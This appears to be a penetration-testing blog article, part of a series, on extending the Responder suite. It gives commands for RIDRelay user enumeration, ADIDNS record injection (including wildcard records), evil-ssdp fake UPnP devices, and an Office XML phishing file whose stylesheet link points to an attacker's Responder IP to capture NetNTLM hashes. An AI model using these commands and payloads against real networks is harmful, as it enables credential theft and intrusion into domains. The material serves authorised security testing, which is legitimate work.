In the previous two articles in this series we covered various ideas and theories on how to expand and utilise the entire Responder suite. This article is going to focus on expanding the suite further with a focus on practical usages for your penetration tests. If you have not already read the previous two articles in the series, you can find them on this website. I strongly advise that you read these two articles before this one, as this article assumes the knowledge contained within them.
Practical Applications – Identifying Targets
The primary difficulty with using MultiRelay is the identification and capturing of admin users and their hashes. Whilst you can specify an "ALL" parameter within MultiRelay if you are using the following techniques effectively this will likely create a lot of failed login attempt noise on the network. The tool RIDRelay, created by skorov allows us to enumerate all users on a domain with RID cycling using the hash passing. This tool can help us find admin users and other targets, privileges are not required.
To execute this attack successfully you merely need to start the tool using ridrelay.py –t <target> where the target parameter is a host on the domain. You can also use the –o parameter to output enumerated usernames to a file.
Example command: python ridrelay.py –t 192.168.1.11 –o output.txt
The final step in the process is to get a user on the domain to connect to the SMB server within RIDRelay. To do this you can use any of the methods mentioned in the previous articles or one of the methods introduced below. Make sure that you turn off the SMB server in Responder temporarily if you started Responder before RIDRelay, or it will fail to bind to the necessary ports.
The download for this tool can be found on its GitHub page here: https://github.com/skorov/ridrelay
Practical Applications – ADIDNS
Since this method's history and technical background is so beautifully explained in this article: https://blog.netspi.com/exploiting-adidns/, we will only cover the basic practical usage of the tool. If you want to learn how this tool works and its history, please go and read the aforementioned article.
By manipulating dynamic DNS updates we are able to insert DNS records into ADIDNS if the default secure dynamic updates setting is enabled. Using the tool linked to below you can insert various records using the following commands:
Run this first:
Invoke-DNSUpdate –DNSType <type> -DNSName <subdomain/FQDN> -DNSData <destination>
Example: Invoke-DNSUpdate –DNSType A -DNSName smb.domain.local -DNSData 192.168.1.11
By inserting a new A record into ADIDNS we could re-route traffic from a major SMB server on the network to our own Responder server. It is also possible to add a wildcard record which will resolve as a fall back option for all DNS queries that do not exist within the DNS zone. This acts much like LLMNR/NBNS spoofing but may be available when they are not. You can also exploit WPAD through Responder even when LLMNR or wildcard additions are not available by adding a wpad record to the DNS zone.
New-ADIDNSNode –Node *
There are some limitations to what records you can and cannot add discussed in the article above, in essence; you will be unable to edit existing DNS records but are able to add new ones.
The download for this tool can be found on its GitHub page here: https://github.com/Kevin-Robertson/Powermad
Practical Applications – SSDP
Another excellent tool which can help you exploit a Windows network is evil-ssdp. This tool creates a fake UPnP device using SSDP spoofing which will appear in users' Windows Explorer windows. When a user clicks on one of these fake UPnP devices, they can be redirected to malicious web pages which will allow you to grab their NetNTLM hash. As an interesting secondary capability, the tool is also capable of identifying XML related vulnerabilities in various applications.
Evil-ssdp can be executed by running the following:
essdp.py <interface> -t <template file>
Example: essdp.py eth0 –t Microsoft-azure
After running this command Windows devices on your local network will begin to detect your fake UPnP device and will display it to users. If the users click on this device, evil-ssdp will attempt to make an SMB connection back to your attacking machine. To intercept this and grab hashes or execute a hash passing attack make sure you are running Responder as discussed in previous articles. This will only work on old browsers that still support the file:// tag. The phishing functionality, which is shown below, works in all browsers.
If you wish to maximise the effectiveness of this tool, I highly recommend creating your own template file to mimic the environment a user would normally see when visiting an internal website. A section on creating your own templates can be found towards the bottom of the Gitlab page, which can be found here: https://gitlab.com/initstring/evil-ssdp
Practical Applications – XML Office Files
This method is discussed in detail in this post here: https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/
This attack method can be used very effectively in an email phishing campaign against a domain, especially when targeted at admin users identified by RIDRelay. To create an XML file which will send the reader's hash to your Responder instance create the following XML file in a text editor:
<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet type="text/xsl" href=\\<Your Responder IP\directory\file.xsl?>
If you wish to add content to the Word document to make it look legitimate, you can first generate the document in Word and save it as an XML file via the Save As menu. After doing this, you can insert the third line of code in the XML code above into the top of your XML file. This method can be executed with multiple types of Office document including Excel spread sheets. When your victim opens this file they will be prompted to select an Office application to open it with if they have not opened an Office XML file before. If the target domain/host has a text editor assigned to read XML files by default, this attack is unlikely to work.
For further information on this attack, I highly recommend reading the article linked above.
Thank you for reading my practical guide to Responder, which builds upon my previous two guides for Intermediate and Advanced usage of the tool. If I find more ways to utilise the Responder suite in the future, I will issue another article discussing them. Responder is an extremely flexible tool, not just a niche attack for LLMNR/NBNS spoofing, as such; I highly recommend you seek out your own methods to expand your suite as well.